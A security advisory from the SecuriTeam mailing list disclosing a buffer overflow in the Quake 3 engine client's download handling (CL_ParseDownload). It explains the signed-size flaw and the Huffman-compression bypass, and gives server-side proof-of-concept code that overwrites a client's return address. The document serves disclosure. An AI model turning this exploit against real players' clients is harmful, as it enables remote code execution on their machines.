[NEWS] Quake 3 Engine Client Buffer Overflow

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -



Quake 3 Engine Client Buffer Overflow
------------------------------------------------------------------------


SUMMARY

The <http://www.idsoftware.com> Quake 3 engine is the famous game engine
developed by id Software.

Improper handling of user input allows attackers to cause a buffer
overflow and execute arbitrary code in Quack 3 based engines.

DETAILS

Vulnerable Systems:
* Quake 3 version 1.32c and prior
* Icculus.org Quake 3 revision 795 and prior

The CL_ParseDownload function located in code/client/cl_parse.c is used by
the clients for handling the download commands (svc_download) received
from the server.

The function uses a signed 16 bit number sent by the server for copying
raw data from the network to the data buffer of 16384 (MAX_MSGLEN) bytes:

void CL_ParseDownload ( msg_t *msg ) {
int size;
unsigned char data[MAX_MSGLEN];
...
size = MSG_ReadShort ( msg );
if (size > 0)
MSG_ReadData( msg, data, size );
...

Some interesting details:
The (reassembled) packets handled by Quake 3 can be max 16384 bytes but is
possible to bypass this limit through the Huffman compression used
automatically and trasparently in the engine (thanks to Thilo Schulz).
In short for exploiting this bug is enough to use 16384 NULL (0x00) bytes,
which occupy a very small amount of space, followed by the usual "stuff"
(return address to overwrite and shellcode).
The data copied with the MSG_ReadData is raw so there are no bad bytes to
avoid for the exploitation.
Note that the svc_download can be sent to the client in any moment so the
client can be attacked also immediately after the ending of the connect
handshake (just the first server's message).

The server must be modified for sending the malformed svc_download command
and is possible to use the following instructions which demonstrate how to
overwrite the return address with 0x61616161.
It's enough to place them in code/server/sv_client.c just after the "//
send the gamestate" comment at about line 575:

// send the gamestate
int i;
MSG_WriteByte( &msg, svc_download );
MSG_WriteShort( &msg, -1 ); // block != 0, for fast return
MSG_WriteShort( &msg, 16384 + 32 ); // amount of bytes to copy
for(i = 0; i < 16384; i++) { // overwrite the data buffer
MSG_WriteByte(&msg, 0x00); // 0x00 for saving space
}
for(i = 0; i < 32; i++) { // do the rest of the job
MSG_WriteByte(&msg, 'a'); // return address: 0x61616161
}
SV_SendMessageToClient( &msg, client );
return;

Vendor Status:
* Icculus will release a fix.
* ID Software did not respond.
* Other vendors were not modified.


ADDITIONAL INFORMATION

The information has been provided by <mailto:aluigi@xxxxxxxxxxxxx> Luigi
Auriemma.
The original article can be found at:
<http://aluigi.altervista.org/adv/q3cbof-adv.txt>
http://aluigi.altervista.org/adv/q3cbof-adv.txt



========================================


This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@xxxxxxxxxxxxxx
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@xxxxxxxxxxxxxx


====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

Relevant Pages

  • [NEWS] Sauerbraten Engine Multiple Vulnerabilities (Exploit)
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... The problem, which affects both server and clients, is that this code ... C] Clients Crash Through Invalid Map ... When a client ...
    (Securiteam)
  • [NEWS] Cube Engine Multiple Vulnerabilities (Exploit)
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... The problem, which affects both server and clients, is that this code ... C] Clients Crash through Invalid Map ... client tries to load an invalid map file it will exit immediately showing ...
    (Securiteam)
  • [UNIX] Multiple up-imapproxy DoS Vulnerabilities
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... connections open after client has logged out, ... allows attacker to cause the server to crash by sending them when they ... extern void HandleRequest(int); ...
    (Securiteam)
  • [NEWS] Soldier Of Fortune II Format String (Through PunkBuster)
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... PB for server version 1.180 and prior ... players who use invalid cvars, for example with values outside the range ... The message sent to the client contains both the name of the monitored ...
    (Securiteam)
  • [NT] Horde Multiple XSS
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... based on PHP and the Horde Framework." ... Horde is subject to a client side script injection vulnerability in the ...
    (Securiteam)